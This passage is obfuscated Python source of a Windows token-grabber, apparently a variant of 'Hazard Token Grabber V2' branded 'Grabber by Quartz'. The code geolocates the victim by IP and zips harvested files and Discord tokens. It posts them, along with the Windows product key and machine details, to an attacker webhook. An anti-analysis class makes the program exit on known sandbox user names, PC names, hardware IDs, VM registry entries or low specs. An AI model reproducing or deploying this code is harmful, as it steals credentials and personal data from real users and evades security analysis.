                    if not OO00OO0000OOO000O :#line:478
                        O0O00OO00O000OOOO .close ()#line:479
                        os .remove (OOOO0OO000O0OOO0O )#line:480
                    else :#line:481
                        with open (OOOO0OO000O0OOO0O ,"w",encoding ="utf-8",errors ="ignore")as O00O00OO0OOO00000 :#line:482
                            O00O00OO0OOO00000 .write ("🌟・Grabber by Quartz\n\n")#line:483
                        with open (OOOO0OO000O0OOO0O ,"a",encoding ="utf-8",errors ="ignore")as O00O0O000000OOOOO :#line:484
                            O00O0O000000OOOOO .write (OO00OO0000OOO000O +"\n\n🌟・Grabber by Quartz")#line:485
        O00O0O00OO00O00OO =O0OO0OOOO0OOOO000 .getProductValues ()#line:487
        O0OOO0O0000OOOO00 =O00O0O00OO00O00OO [0 ].replace (" ","᠎ ")#line:488
        OO0O0OO0O00OO00O0 =O00O0O00OO00O00OO [1 ].replace (" ","᠎ ")#line:489
        O0000O0OOOO0OO000 =["https://ipinfo.io/json","https://utilities.tk/network/info"]#line:491
        OO000OOOOOOOO0OOO =choice (O0000O0OOOO0OO000 )#line:492
        O000OO000000000O0 =httpx .get (OO000OOOOOOOO0OOO ).json ()#line:493
        OO00OOOO0O00O00OO =O000OO000000000O0 .get ('ip')#line:495
        O00OOO00OO00OO00O =O000OO000000000O0 .get ('city')#line:496
        O0O0O0OOO000OO00O =O000OO000000000O0 .get ('country')#line:497
        O0OOO0O0OOOO0O0O0 =O000OO000000000O0 .get ('region')#line:498
        OO0OO0O0O0OO0O000 =O000OO000000000O0 .get ('org')#line:499
        O0O0OO00OOOOO0OOO =O000OO000000000O0 .get ('loc')#line:500
        O0000OO0O0OO0O00O ="https://www.google.com/maps/search/google+map++"+O0O0OO00OOOOO0OOO #line:501
        _O00OO0OOOO000O000 =os .path .join (O0OO0OOOO0OOOO000 .appdata ,f'Hazard.V2-[{Victim}].zip')#line:503
        O0OO00OO0OOO00O00 =zipfile .ZipFile (_O00OO0OOOO000O000 ,"w",zipfile .ZIP_DEFLATED )#line:504
        OOOO000OO000OO000 =os .path .abspath (O0OO0OOOO0OOOO000 .dir )#line:505
        for O0000O000OOO0O000 ,_OOO0OOO00O00OO000 ,OO0000OOO0O00O0O0 in os .walk (O0OO0OOOO0OOOO000 .dir ):#line:506
            for OO000OOO0O0O0O00O in OO0000OOO0O00O0O0 :#line:507
                O0O0O0O0OOOOOOO0O =os .path .abspath (os .path .join (O0000O000OOO0O000 ,OO000OOO0O0O0O00O ))#line:508
                OOOOOO00000O0O00O =O0O0O0O0OOOOOOO0O [len (OOOO000OO000OO000 )+1 :]#line:509
                O0OO00OO0OOO00O00 .write (O0O0O0O0OOOOOOO0O ,OOOOOO00000O0O00O )#line:510
        O0OO00OO0OOO00O00 .close ()#line:511
        OO0OOOOO0OO0O0000 =''#line:512
        for O00O00OO0OOO00000 in os .listdir (O0OO0OOOO0OOOO000 .dir ):#line:513
            OO0OOOOO0OO0O0000 +=f"・{O00O00OO0OOO00000}\n"#line:514
        OOO0000OOOO000O0O =''#line:515
        for OOO00OOOOOO000O00 in O0OO0OOOO0OOOO000 .tokens :#line:516
            OOO0000OOOO000O0O +=f'{OOO00OOOOOO000O00}\n\n'#line:517
        O0O0OOO00OO0O0000 =f"{len(OO0000OOO0O00O0O0)} Files Found: "#line:518
        OOOO0O0O00OO0O0O0 ={'avatar_url':'https://quartzwarrior.xyz/Quartzgif.gif','embeds':[{'author':{'name':f'*{Victim}* Just ran Token Grabber','url':'https://github.com/Rdimo/Hazard-Token-Grabber-V2','icon_url':'https://quartzwarrior.xyz/Quartzgif.gif'},'color':176185 ,'description':f'[Google Maps Location]({O0000OO0O0OO0O00O})','fields':[{'name':'\u200b','value':f'''```fix
                                IP:᠎ {OO00OOOO0O00O00OO.replace(" ", "᠎ ") if OO00OOOO0O00O00OO else "N/A"}
                                Org:᠎ {OO0OO0O0O0OO0O000.replace(" ", "᠎ ") if OO0OO0O0O0OO0O000 else "N/A"}
                                City:᠎ {O00OOO00OO00OO00O.replace(" ", "᠎ ") if O00OOO00OO00OO00O else "N/A"}
                                Region:᠎ {O0OOO0O0OOOO0O0O0.replace(" ", "᠎ ") if O0OOO0O0OOOO0O0O0 else "N/A"}
                                Country:᠎ {O0O0O0OOO000OO00O.replace(" ", "᠎ ") if O0O0O0OOO000OO00O else "N/A"}```
                            '''.replace (' ',''),'inline':True },{'name':'\u200b','value':f'''```fix
                                PCName: {Victim_pc.replace(" ", "᠎ ")}
                                WinKey:᠎ {OO0O0OO0O00OO00O0}
                                Platform:᠎ {O0OOO0O0000OOOO00}
                                DiskSpace:᠎ {disk}GB
                                Ram:᠎ {ram}GB```
                            '''.replace (' ',''),'inline':True },{'name':'**Tokens:**','value':f'''```yaml
                                {OOO0000OOOO000O0O if OOO0000OOOO000O0O else "No tokens extracted"}```
                            '''.replace (' ',''),'inline':False },{'name':O0O0OOO00OO0O0000 ,'value':f'''```ini
                                [
                                {OO0OOOOO0OO0O0000.strip()}
                                ]```
                            '''.replace (' ',''),'inline':False }],'footer':{'text':'🌟・Grabber by Quartz'}}]}#line:575
        with open (_O00OO0OOOO000O000 ,'rb')as O00O00OO0OOO00000 :#line:576
            if O0OO0OOOO0OOOO000 .hook_reg in O0OO0OOOO0OOOO000 .webhook :#line:577
                httpx .post (O0OO0OOOO0OOOO000 .webhook ,json =OOOO0O0O00OO0O0O0 )#line:578
                httpx .post (O0OO0OOOO0OOOO000 .webhook ,files ={'upload_file':O00O00OO0OOO00000 })#line:579
            else :#line:580
                from pyotp import TOTP #line:581
                OOO00OO0O00O00OO0 =TOTP (O0OO0OOOO0OOOO000 .fetch_conf ('protection')).now ()#line:582
                httpx .post (O0OO0OOOO0OOOO000 .webhook ,headers ={"Authorization":OOO00OO0O00O00OO0 },json =OOOO0O0O00OO0O0O0 )#line:583
                httpx .post (O0OO0OOOO0OOOO000 .webhook ,headers ={"Authorization":OOO00OO0O00O00OO0 },files ={'upload_file':O00O00OO0OOO00000 })#line:584
        os .remove (_O00OO0OOOO000O000 )#line:585
class AntiDebug (Functions ):#line:588
    inVM =False #line:589
    def __init__ (O0O0O0000O00O00O0 ):#line:591
        O0O0O0000O00O00O0 .processes =list ()#line:592
        O0O0O0000O00O00O0 .blackListedUsers =["WDAGUtilityAccount","Abby","Peter Wilson","hmarc","patex","JOHN-PC","RDhJ0CNFevzX","kEecfMwgj","Frank","8Nl0ColNQ5bq","Lisa","John","george","PxmdUOpVyx","8VizSM","w0fjuOVmCcP5A","lmVwjj9b","PqONjHVwexsS","3u2v9m8","Julia","HEUeRzl",]#line:597
        O0O0O0000O00O00O0 .blackListedPCNames =["BEE7370C-8C0C-4","DESKTOP-NAKFFMT","WIN-5E07COS9ALR","B30F0242-1C6A-4","DESKTOP-VRSQLAG","Q9IATRKPRH","XC64ZB","DESKTOP-D019GDM","DESKTOP-WI8CLET","SERVER1","LISA-PC","JOHN-PC","DESKTOP-B0T93D6","DESKTOP-1PYKP29","DESKTOP-1Y2433R","WILEYPC","WORK","6C4E733F-C2D9-4","RALPHS-PC","DESKTOP-WG3MYJS","DESKTOP-7XC6GEZ","DESKTOP-5OV9S0O","QarZhrdBpj","ORELEEPC","ARCHIBALDPC","JULIA-PC","d1bnJkfVlH",]#line:602
        O0O0O0000O00O00O0 .blackListedHWIDS =["7AB5C494-39F5-4941-9163-47F54D6D5016","032E02B4-0499-05C3-0806-3C0700080009","03DE0294-0480-05DE-1A06-350700080009","11111111-2222-3333-4444-555555555555","6F3CA5EC-BEC9-4A4D-8274-11168F640058","ADEEEE9E-EF0A-6B84-B14B-B83A54AFC548","4C4C4544-0050-3710-8058-CAC04F59344A","00000000-0000-0000-0000-AC1F6BD04972","79AF5279-16CF-4094-9758-F88A616D81B4","5BD24D56-789F-8468-7CDC-CAA7222CC121","49434D53-0200-9065-2500-65902500E439","49434D53-0200-9036-2500-36902500F022","777D84B3-88D1-451C-93E4-D235177420A7","49434D53-0200-9036-2500-369025000C65","B1112042-52E8-E25B-3655-6A4F54155DBF","00000000-0000-0000-0000-AC1F6BD048FE","EB16924B-FB6D-4FA1-8666-17B91F62FB37","A15A930C-8251-9645-AF63-E45AD728C20C","67E595EB-54AC-4FF0-B5E3-3DA7C7B547E3","C7D23342-A5D4-68A1-59AC-CF40F735B363","63203342-0EB0-AA1A-4DF5-3FB37DBB0670","44B94D56-65AB-DC02-86A0-98143A7423BF","6608003F-ECE4-494E-B07E-1C4615D1D93C","D9142042-8F51-5EFF-D5F8-EE9AE3D1602A","49434D53-0200-9036-2500-369025003AF0","8B4E8278-525C-7343-B825-280AEBCD3BCB","4D4DDC94-E06C-44F4-95FE-33A1ADA5AC27",]#line:613
        for O000OO00OOOOOOO0O in [O0O0O0000O00O00O0 .listCheck ,O0O0O0000O00O00O0 .registryCheck ,O0O0O0000O00O00O0 .specsCheck ]:#line:615
            OO000O0O00000O0OO =threading .Thread (target =O000OO00OOOOOOO0O ,daemon =True )#line:616
            O0O0O0000O00O00O0 .processes .append (OO000O0O00000O0OO )#line:617
            OO000O0O00000O0OO .start ()#line:618
        for O000OOOO0O0O000OO in O0O0O0000O00O00O0 .processes :#line:619
            try :#line:620
                O000OOOO0O0O000OO .join ()#line:621
            except RuntimeError :#line:622
                continue #line:623
    def programExit (OOOO00OO00O0OOOO0 ):#line:625
        OOOO00OO00O0OOOO0 .__class__ .inVM =True #line:626
    def programKill (OOOO00O000O0OO0O0 ,O00O000OOOO000OO0 ):#line:628
        try :#line:629
            os .system (f"taskkill /F /T /IM {O00O000OOOO000OO0}")#line:630
        except (PermissionError ,InterruptedError ,ChildProcessError ,ProcessLookupError ):#line:631
            pass #line:632
    def listCheck (OOO0000OOOOO00OOO ):#line:634
        for OOOOO00O0000000O0 in [r'D:\Tools',r'D:\OS2',r'D:\NT3X']:#line:635
            if os .path .exists (OOOOO00O0000000O0 ):#line:636
                OOO0000OOOOO00OOO .programExit ()#line:637
        for OO00O000O0000O0OO in OOO0000OOOOO00OOO .blackListedUsers :#line:639
            if Victim ==OO00O000O0000O0OO :#line:640
                OOO0000OOOOO00OOO .programExit ()#line:641
        for O0O0O000O0O0OOOOO in OOO0000OOOOO00OOO .blackListedPCNames :#line:643
            if Victim_pc ==O0O0O000O0O0OOOOO :#line:644
                OOO0000OOOOO00OOO .programExit ()#line:645
        try :#line:647
            O0O0O00000O0O0000 =subprocess .check_output (r"wmic csproduct get uuid",creationflags =0x08000000 ).decode ().split ('\n')[1 ].strip ()#line:648
        except Exception :#line:649
            O0O0O00000O0O0000 =""#line:650
        for O00OOOOOOO00OO00O in OOO0000OOOOO00OOO .blackListedHWIDS :#line:651
            if O0O0O00000O0O0000 ==O00OOOOOOO00OO00O :#line:652
                OOO0000OOOOO00OOO .programExit ()#line:653
    def specsCheck (O000OOOOO000O00OO ):#line:655
        if int (ram )<=2 :#line:657
            O000OOOOO000O00OO .programExit ()#line:658
        if int (disk )<=50 :#line:659
            O000OOOOO000O00OO .programExit ()#line:660
        if int (psutil .cpu_count ())<=1 :#line:661
            O000OOOOO000O00OO .programExit ()#line:662
    def registryCheck (OO0OO00O00O0OO000 ):#line:664
        O0O0O0O0O000OOO00 =os .system ("REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\DriverDesc 2> nul")#line:665
        OOOOOO000O00O00OO =os .system ("REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\ProviderName 2> nul")#line:666
        if (O0O0O0O0O000OOO00 and OOOOOO000O00O00OO )!=1 :#line:667
            OO0OO00O00O0OO000 .programExit ()#line:668
        O00OO0O0O000OO00O =winreg .OpenKey (winreg .HKEY_LOCAL_MACHINE ,'SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum')#line:670
        try :#line:671
            O00OOO0O0O000O0OO =winreg .QueryValueEx (O00OO0O0O000OO00O ,'0')[0 ]#line:672
            if ("VMware"or "VBOX")in O00OOO0O0O000O0OO :#line:673
                OO0OO00O00O0OO000 .programExit ()#line:674
        finally :#line:675
            winreg .CloseKey (O00OO0O0O000OO00O )#line:676
if __name__ =="__main__"and os .name =="nt":#line:679
    try :#line:680
        httpx .get ('https://google.com')#line:681
    except httpx .ConnectTimeout :#line:682
        os ._exit (0 )#line:683
    asyncio .run (HazardTokenGrabberV2 ().init ())#line:684